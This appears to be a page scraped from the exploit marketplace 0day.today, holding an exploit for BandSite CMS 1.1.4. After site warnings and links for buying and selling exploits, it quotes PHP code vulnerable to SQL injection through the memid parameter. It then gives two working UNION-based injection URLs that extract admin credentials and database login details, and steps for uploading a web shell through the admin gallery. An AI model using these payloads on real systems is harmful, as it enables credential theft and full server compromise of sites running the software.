0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability
================================================================== BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability ================================================================== ######################################################################### [+] Remote SQL Injection - The script is full of SQLI bugs.This is one of them. - Vulnerable code in includes\content\member_content.php ----------------------------------------------------------------------------------------------------------------------------------- $memid = $_REQUEST['memid']; // define the query // if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry if(isset($memid)){ $query = " SELECT * FROM memberbios WHERE rec_id=$memid"; } ----------------------------------------------------------------------------------------------------------------------------------- PoC 1 : http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,admin_username,admin_password,admin_email),4,5,6,7 from config-- PoC 2 : http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,db_username,db_password,db_name,db_host),4,5,6,7 from config-- [+] Upload Shell - Need to be logged in as administrator. Go to : http://127.0.0.1/adminpanel/index.php?action=addphotos Add the shell : cmd.php You will find your shell here : http://127.0.0.1/images/gallery/cmd.php ######################################################################### # 0day.today [2024-12-25] #